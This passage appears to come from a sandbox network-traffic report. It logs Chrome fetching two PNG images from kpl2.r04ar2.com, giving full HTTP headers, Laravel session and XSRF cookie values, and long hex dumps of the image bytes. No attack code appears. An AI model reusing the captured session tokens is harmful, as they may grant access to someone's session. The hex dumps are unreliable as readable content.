                                                          2024-08-27 22:11:14 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 52 56 5a 48 5a 6a 56 44 6c 49 4c 32 63 33 64 47 52 76 56 6d 56 31 4b 32 39 6f 59 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 31 6b 31 4e 57 68 49 4e 47 4a 34 51 6e 46 72 52 57 35 48 56 44 5a 7a 4b 30 55 7a 5a 54 64 76 5a 6c 4e 49 54 6d 31 50 4e 58 70 6e 4e 47 31 5a 53 45 77 32 52 54 64 4a 64 58 70 6a 57 6d 39 58 62 56 4e 73 4d 32 31 6d 4e 6e 6f 77 63 45 68 6f 5a 55 6c 6f 62 55 6c 78 4d 57 46 45 55 56 4e 4f 4e 47 74 73 65 54 5a 7a 56 6b 64 50 62 30 67 34 64 6e 5a 6d 65 55 38 35 57 47 68 6c 56 57 52 76 5a 56 67 77 52 6d 5a 79 63 58 5a 77 62 54 64 6c 65 6a 4a 49 64 6a 6c 73 57 6b 34 7a 59 6d 5a 72 52 48 41 77 57 43 74 31 4d 6b 49
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlRVZHZjVDlIL2c3dGRvVmV1K29oY1E9PSIsInZhbHVlIjoic1k1NWhINGJ4QnFrRW5HVDZzK0UzZTdvZlNITm1PNXpnNG1ZSEw2RTdJdXpjWm9XbVNsM21mNnowcEhoZUlobUlxMWFEUVNONGtseTZzVkdPb0g4dnZmeU85WGhlVWRvZVgwRmZycXZwbTdlejJIdjlsWk4zYmZrRHAwWCt1MkI
                                                          2024-08-27 22:11:14 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                          Data Ascii: 11
                                                          2024-08-27 22:11:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          82192.168.2.449883188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:14 UTC1117OUTGET /ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:15 UTC657INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:15 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 49602
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTyCoHtr7LyDF%2BiFo9cdD32TohE%2Fy2LQLVg3%2BLxiFMHB9m90KFewu4Gs9XiUUjvDdUqBYRG%2FeRDNid8nyGqUnwtB4nzL33%2Fuyp%2Fvej9%2FEfdk8ZEuCxPvTXaNsXmRfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65723b371871-EWR
                                                          2024-08-27 22:11:15 UTC712INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                          Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27
                                                          Data Ascii: $I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe
                                                          Data Ascii: PD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HM
                                                          2024-08-27 22:11:15 UTC1369INData Raw: d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0
                                                          Data Ascii: zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                                                          2024-08-27 22:11:15 UTC1369INData Raw: f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4
                                                          Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad
                                                          Data Ascii: 3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f
                                                          Data Ascii: I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c
                                                          Data Ascii: R?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<
                                                          2024-08-27 22:11:15 UTC1369INData Raw: a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f
                                                          Data Ascii: e&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                          2024-08-27 22:11:15 UTC1369INData Raw: bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79 65 72 1b f0 66 e0 5f
                                                          Data Ascii: -%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVyerf_


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          83192.168.2.449884188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:14 UTC1127OUTGET /staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:15 UTC657INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:15 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 70712
                                                          Connection: close
                                                          Content-Disposition: inline; filename="staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kW1DHJ5uqvfBwZL0lokE%2B39wYqvyXgrhK0c2EoYMgwauOAz6G0yZ3%2B8Da3aljeAMMn8gSCDmYvIjFPmFbcL6clqdD3aleTS5Xas3Cob05JQqfECUFoIaHylLfw12Gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65726b8d78d5-EWR
                                                          2024-08-27 22:11:15 UTC712INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                          Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
